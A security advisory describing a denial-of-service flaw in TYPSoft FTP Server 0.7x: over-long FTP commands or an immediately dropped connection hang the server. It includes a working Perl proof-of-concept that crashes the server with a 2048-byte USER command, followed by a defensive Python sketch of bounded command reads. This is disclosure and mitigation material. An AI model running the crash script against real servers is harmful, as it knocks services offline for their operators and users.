COMMAND

    TYPSoft FTPd

SYSTEMS AFFECTED

    TYPSoft FTP Server 0.7x

PROBLEM

    'dethy' found the following.  TYPSoft FTP is a freeware FTP server
    with all the necessary features for beginners and advanced users.

    TYPSoft FTP Server does not correctly handle long commands of over
    2048 bytes (2 KB).  Sending a long 'user', 'pass', 'cwd', etc.
    causes the server to hang and consume increasing system resources.
    The process will not be active again until it is manually
    restarted.

    This product is also vulnerable if you connect to the server but
    do not send anything (complete the SYN/ACK sequence but disconnect
    immediately).  This is due to the fact that it uses a Delphi
    TSocket class, which doesn't handle exceptions very well.

    The following simple script sends a long 'user' command to the
    server, resulting in the ftpd crashing:

        #!/usr/bin/perl
        use Getopt::Std;
        use IO::Socket;

        # -s <server> is the only option
        getopts('s:', \%args);
        if(!defined($args{s})){&usage;}
        $serv = $args{s};

        # 2048 'A' characters as the USER argument, CRLF line ending
        $foo = "A"; $number = 2048;
        $data .= $foo x $number; $EOL="\015\012";

        $remote = IO::Socket::INET->new(
            Proto    => "tcp",
            PeerAddr => $args{s},
            PeerPort => "ftp(21)",
        ) || die("Unable to connect to ftp port at $args{s}\n");
        $remote->autoflush(1);

        # send the over-long command, then echo whatever the server returns
        print $remote "USER $data". $EOL;
        while (<$remote>){ print }
        print("\nCrash was successful !\n");

        sub usage {die("\n$0 -s <server>\n\n");}

SOLUTION

    The vendor has been contacted.  Wait until a patched version comes
    out or use an alternative product.
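
    For implementers, the two failure modes described above (an
    over-long command line and a connection that closes before sending
    anything) come down to bounded reads and clean handling of socket
    errors.  The sketch below is an added example in Python, not
    TYPSoft's code; the 512-byte cap, the timeout and the function
    names are assumptions chosen for illustration.

```python
import socket

MAX_LINE = 512  # assumed cap, well under the 2048 bytes named in the advisory

def read_command(conn, max_line=MAX_LINE, timeout=5.0):
    """Read one CRLF-terminated command; return (status, line).

    status is "ok", "too_long", "closed" or "timeout". Memory use is bounded
    by max_line plus one recv() chunk, whatever the client sends.
    """
    conn.settimeout(timeout)
    buf = bytearray()
    try:
        while b"\n" not in buf:
            if len(buf) > max_line:
                return "too_long", None      # stop reading, do not buffer more
            chunk = conn.recv(256)
            if not chunk:                    # connect-then-disconnect case
                return "closed", None
            buf += chunk
    except socket.timeout:
        return "timeout", None
    except OSError:                          # reset by peer and similar
        return "closed", None
    line = bytes(buf).split(b"\n", 1)[0].rstrip(b"\r")
    if len(line) > max_line:
        return "too_long", None
    return "ok", line.decode("latin-1")

def handle_client(conn):
    """Handle a single command; every failure path ends the session cleanly."""
    try:
        status, line = read_command(conn)
        if status == "ok":
            verb = line.split(" ", 1)[0].upper()
            reply = b"331 Password required.\r\n" if verb == "USER" \
                else b"502 Command not implemented.\r\n"
            conn.sendall(reply)
        elif status == "too_long":
            conn.sendall(b"500 Command line too long.\r\n")
        return status
    except OSError:                          # peer vanished while we replied
        return "closed"
    finally:
        conn.close()
```

    A real server would loop over commands and keep any bytes received
    after the first line; this sketch handles one command per
    connection to keep the bounded-read logic in view.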